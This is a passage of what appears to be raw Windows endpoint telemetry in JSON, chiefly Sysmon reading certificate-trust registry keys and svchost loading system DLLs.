"registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mi.dll", - "image_path": "C:\\Windows\\System32\\mi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "webio.dll", - "image_path": "C:\\Windows\\System32\\webio.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 
131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881990000, - 